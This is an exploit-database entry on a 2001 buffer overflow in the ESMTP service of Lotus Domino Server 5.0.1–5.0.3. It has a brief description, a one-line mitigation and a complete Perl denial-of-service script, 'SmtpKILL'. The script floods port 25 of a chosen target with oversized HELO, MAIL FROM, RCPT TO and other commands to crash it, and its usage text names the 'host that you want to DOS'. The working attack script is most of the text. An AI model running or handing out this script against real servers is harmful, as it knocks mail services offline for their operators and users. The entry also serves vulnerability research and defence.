Lotus Domino Enterprise Server 5.0.1/5.0.2/5.0.3,Mail Server 5.0.1/5.0.2/5.0.3 Buffer Overflow

vendor:

Domino Enterprise Server

by:

smiler@vxd.org

7.5

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: Domino Enterprise Server

Affected Version From: 5.0.1

Affected Version To: 5.0.3

Patch Exists: NO

Related CWE: N/A

CPE: Lotus_Domino_Enterprise_Server/5.0.1,_5.0.2,_5.0.3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2001

Lotus Domino Enterprise Server 5.0.1/5.0.2/5.0.3,Mail Server 5.0.1/5.0.2/5.0.3 Buffer Overflow

The code that handles the 'rcpt to' 'saml from' and 'soml from' commands in the ESMTP service of Lotus Domino Server has an unchecked buffer. If Lotus Domino Server receives an argument of more than 4 KB to the any of the listed commands, the system will crash and will require a reboot in order to regain normal functionality.

Mitigation:

Ensure that the ESMTP service of Lotus Domino Server is not exposed to the public internet.

Source

Exploit-DB raw data:

Lotus Domino Enterprise Server 5.0.1/5.0.2/5.0.3,Mail Server 5.0.1/5.0.2/5.0.3 Buffer Overflow

source: https://www.securityfocus.com/bid/1229/info

The code that handles the 'rcpt to' 'saml from' and 'soml from' commands in the ESMTP service of Lotus Domino Server has an unchecked buffer. If Lotus Domino Server receives an argument of more than 4 KB to the any of the listed commands, the system will crash and will require a reboot in order to regain normal functionality. 

#!/usr/bin/perl
# Need net::telnet to run
# Expl0it By smiler@vxd.org
# Tested with sucess against Lotus Notes 5.0.1, 5.0.2b, 5.0.3
# CMail Server version 2.4.6, Argosoft Mail Server version 1.2.1.0 
# and probably many others that I hadnt chance to explore.
# I wrote this after Michal Zalewski brought this issue in BugTraq.
# Cheers 351 and FractalG :)

use Net::Telnet;   


print "SmtpKILL By smiler\@vxd.org\n";

if (not $ARGV[1]) {
print qq~
Usage : smtpkill.pl  <type> <host>
	<type> Type of attack :
		type 1 = long mail from: someone\@4k_of_junk
		type 2 = long rcpt to: someone\@4k_of_junk
		type 3 = long helo longdomain_with_4k_of_junk
		type 4 = long undefined command (4k_of_junk)
		type 5 = long help 4k_of_junk
		type 6 = long mail from: and mail to:

	<host> Host that you want to DOS, Ip or Domain will be ok.
Example Usage : smtpkill.pl 5 127.0.0.1
~; exit;}      

$type=$ARGV[0];
$target=$ARGV[1];

print "TYPE ATTACK: $type\n";
print "TARGET : $target\n";



for ($i=4096;$i<5096;$i++)
 {
        $obj=Net::Telnet->new( Host => "$target",Port => 25);    

	if ($type=~ "1") { 
	$helo="helo ptrulez";
	$from="mail from: v0v0@". 'ptrulez' x $i;
	$rcpt="rcpt to: v0v0\@v0v0.pt";
	}

	if ($type=~ "2") { 
	$helo="helo ptrulez";
	$from="mail from: v0v0\@v0v0.pt";
	$rcpt="rcpt to: v0v0@". 'ptrulez' x $i;
	}

	if ($type=~ "3") {
	$helo="helo ". 'ptrulez' x $i;
	$from="mail from: v0v0\@v0v0.pt";
	$rcpt="rcpt to: v0v0\@v0v0.pt";
	}

	if ($type=~ "4") {
	$helo="havesomefun". 'ptrulez' x $i;
	}

	if ($type=~ "5") {
	$helo="help ". 'ptrulez' x $i;
	}

	if ($type=~ "6") {
	$helo="helo ptrulez";
	$from="mail from: ". 'ptrulez' x $i;
	$rcpt="rcpt to: ". 'ptrulez' x $i;
	}

        print "$helo\n";$obj->print("$helo");   
        print "$from\n";$obj->print("$from");
        print "$rcpt\n";$obj->print("$rcpt");    
        $obj->close;
 }